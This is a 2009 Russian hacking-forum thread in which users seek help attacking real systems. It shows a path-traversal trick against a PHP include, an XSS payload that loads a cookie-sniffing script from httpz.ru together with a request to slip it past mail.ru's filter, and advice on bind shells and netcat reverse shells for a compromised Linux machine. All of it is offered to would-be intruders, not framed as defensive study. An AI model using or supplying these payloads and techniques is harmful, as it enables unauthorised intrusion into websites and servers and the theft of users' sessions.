 |
|

24.12.2009, 15:44
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами:
8625696
Репутация:
1
|
|
Я новичок и вот прочтал про php инъекции. Пошарился в гугле и увидел такое: Часто неопытные программисты делают очень большие ошибки. Если например, открыть файл, не проверяя, существует ли он, то это будет очень большая дыра. Пример такой ошибки: include($_GET['page']); А как открыть сам php код?Просто я встретил сайт с php а как его открыть не знаю( Подскажите плиз)
|
|
|

24.12.2009, 15:47
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от гаррет-тень
Я новичок и вот прочтал про php инъекции. Пошарился в гугле и увидел такое: Часто неопытные программисты делают очень большие ошибки. Если например, открыть файл, не проверяя, существует ли он, то это будет очень большая дыра. Пример такой ошибки: include($_GET['page']); А как открыть сам php код?Просто я встретил сайт с php а как его открыть не знаю( Подскажите плиз)
Может перед тем,как становиться крутым хакером, стоит почитать о том как работают те или иные ЯП? И вообще в целом о http и интернете.Тогда такие вопросы пропадут сами собой.
|
|
|

24.12.2009, 15:57
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от гаррет-тень
Я новичок и вот прочтал про php инъекции. Пошарился в гугле и увидел такое: Часто неопытные программисты делают очень большие ошибки. Если например, открыть файл, не проверяя, существует ли он, то это будет очень большая дыра. Пример такой ошибки: include($_GET['page']); А как открыть сам php код?Просто я встретил сайт с php а как его открыть не знаю( Подскажите плиз)
php-include
При таком коде include($_GET['page']); php инклудит файл с именем page в папке со скриптом(можно выйти из границ папки напр. ?page=../../file.php). Соответственно, исполняется php-код и возвращается результат на страницу.
читалка файлов
Чтобы увидеть php-код на странице, нужно искать другие реализации кода, направленные именно на чтение файла (напр. file(), fopen+fgets, идр.) + должен быть вывод на страницу.
__________________
Появляюсь редко. Важные дела в реале.
|
|
|

24.12.2009, 16:00
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами:
8625696
Репутация:
1
|
|
поищу прям ща))) и все-таки?
|
|
|

24.12.2009, 16:07
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами:
8625696
Репутация:
1
|
|
AFoST, спасиб)
|
|
|

24.12.2009, 18:55
|
|
Новичок
Регистрация: 23.12.2009
Сообщений: 1
С нами:
8622919
Репутация:
0
|
|
Здраствуйте можете помочь.Как обойти фильтр на mail.ru(он вроде заменяет точку и пробел на нижнее подчёркивание)Как должна выглядить этот скрипт
%3CSCRIPT_type=text/javascript_src=http://httpz.ru/sniffer.js></SCRIPT>"
|
|
|

25.12.2009, 03:00
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
С нами:
8633638
Репутация:
0
|
|
Пытался пробиндить машину,залил бинд, дал команду perl bind.pl . И ужеминут 15 никакого результата, просто грузится и все. Что с этим делать?
Linux 2.6
|
|
|

25.12.2009, 03:23
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от a1ertso
Пытался пробиндить машину,залил бинд, дал команду perl bind.pl . И ужеминут 15 никакого результата, просто грузится и все. Что с этим делать?
Linux 2.6
делай бэк-коннект. информация есть на форуме.
UPD:http://forum.antichat.ru/thread151993.html
|
|
|

25.12.2009, 03:33
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
С нами:
8633638
Репутация:
0
|
|
пробовал, тоже самое... Только пишет
Now script try connect to 1хх.хх.ххх.ххх port 32767 ...
так и весит
|
|
|

25.12.2009, 03:37
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от a1ertso
пробовал, тоже самое... Только пишет так и весит
неткат у себя запустил?делай всё как в мануале, всё пашет(мб у тебя айпи динамический?)
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|